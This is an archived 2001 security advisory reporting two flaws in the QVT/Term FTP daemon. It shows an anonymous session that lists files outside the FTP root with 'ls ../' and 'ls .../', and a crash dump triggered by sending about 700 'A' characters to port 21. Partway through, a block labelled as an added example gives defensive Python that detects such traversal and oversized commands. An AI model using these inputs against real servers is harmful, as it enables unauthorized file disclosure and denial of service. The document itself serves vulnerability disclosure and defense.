Vulnerabilities in QVT/Term

From: joetestaat_private
Date: Tue Sep 25 2001 - 21:13:17 PDT


    
    Vulnerabilities in QVT/Term
    
    
    
    
        Overview
    
    QVT/Term v5.0 is a suite of Internet tools available from http://www.qpc.com/.  Two
    vulnerabilities exist in the FTP daemon.  The first allows a remote user to list the files
    outside the ftp root.  The second allows a remote user to crash the server.
    
    
    
    
        Details
    
    The following excerpt demonstrates the file listing problem; an ftp root of 'C:\root\root\'
    was used:
    
    
    > ftp localhost
    Connected to xxxxxxxxx.rh.rit.edu.
    220 xxxxxxxxx FTP server (QVT/Net 4.3) ready.
    User (xxxxxxxxx.rh.rit.edu:(none)): anonymous
    331 Guest login OK, please send real ident as password.
    Password:
    230 Guest login OK, access restrictions apply.
    ftp> ls ../
    200 PORT command successful.
    150 Opened data connection for 'ls' (xxxxxxxxx,1048) (0 bytes).
    root
    226 Transfer complete.
    ftp: 6 bytes received in 0.05Seconds 0.12Kbytes/sec.
    ftp> ls .../
         [file listing of C:\ is shown here]
    226 Transfer complete.
    ftp: 1192 bytes received in 0.11Seconds 10.84Kbytes/sec.
    ftp>
    
    
    
    The following is the crash dump that results when a remote user connects to port 21 and
    sends a long stream of 'A's (~700+):
    
    
    
    FTPD caused an invalid page fault in
    module FTPD.EXE at 017f:00404b34.
    Registers:
    EAX=0000200a CS=017f EIP=00404b34 EFLGS=00010213
    EBX=0066799b SS=0187 ESP=0064fac8 EBP=00666a58
    ECX=0000066c DS=0187 ESI=00667ff3 FS=1bb7
    EDX=006699a5 ES=0187 EDI=00669ffd GS=0000
    Bytes at CS:EIP:
    f3 a5 8b c8 68 70 fc 40 00 83 e1 03 53 f3 a4 8b
    Stack dump:
    00000004 00771b90 00666a58 0064fbc0
    0000060a 12948ae8 00771b90 004105a0
    00288b30 bff728a2 0187bff7 bff713e2
    12948b04 0a2c175f 12990002 00288b4c
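Added example, not part of this advisory or of QPC's code: a lexical check that keeps a requested path inside the FTP root (rejecting '..' climbs and dot-only segments such as the '...' shown above) plus a scan over a constructed FTP command log that flags both that traversal and oversized command lines like the ~700-byte stream that crashed FTPD. The log format, client addresses and the 512-byte bound are assumptions.

```python
import re
# Assumption: generous command-length bound, well under the ~700 bytes that crashed FTPD
MAX_CMD_LEN = 512
# RFC 959 verbs whose argument is a path
PATH_CMDS = {"CWD", "LIST", "NLST", "RETR", "STOR", "DELE", "MKD", "RMD"}

def is_confined(requested: str) -> bool:
    """True if `requested` stays inside the FTP root (purely lexical).
    '\\' and '/' both split segments; '.' is a no-op; '..' pops a level and
    dropping below the root fails; other dot-only segments such as '...'
    (which this daemon treated as a climb), absolute paths and drive
    letters fail outright."""
    if re.match(r"^([A-Za-z]:|[\\/])", requested):
        return False
    depth = 0
    for seg in re.split(r"[\\/]+", requested):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return False
            continue
        if set(seg) == {"."}:
            return False
        depth += 1
    return True

# Constructed command log for this example: "<client> <raw command line>"
SAMPLE_LOG = [
    "10.0.0.5 USER anonymous",
    "10.0.0.5 NLST ../",
    "10.0.0.5 NLST .../",
    "10.0.0.5 NLST pub/",
    "10.0.0.9 " + "A" * 700,
]

def scan_log(lines):
    """Return (client, reason) pairs for lines matching either issue."""
    findings = []
    for line in lines:
        client, _, cmdline = line.partition(" ")
        if len(cmdline) > MAX_CMD_LEN:
            findings.append((client, "oversized command (%d bytes)" % len(cmdline)))
            continue
        verb, _, arg = cmdline.partition(" ")
        if verb.upper() in PATH_CMDS and arg and not is_confined(arg):
            findings.append((client, "path escapes ftp root: %r" % arg))
    return findings
```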
    
    
    
    
        Solution
    
    No quick fix is possible.
    
    
    
    
        Vendor Status
    
    QPC Software was contacted via <supportat_private> on Tuesday, September 18, 2001.  No reply
    was received.
    
    
    
    
    
    
        - Joe Testa
    
    e-mail:   joetestaat_private
    web page: http://hogs.rit.edu/~joet/
    
    AIM:      LordSpankatron
    
    
    



    This archive was generated by hypermail 2b30 : Wed Sep 26 2001 - 10:15:22 PDT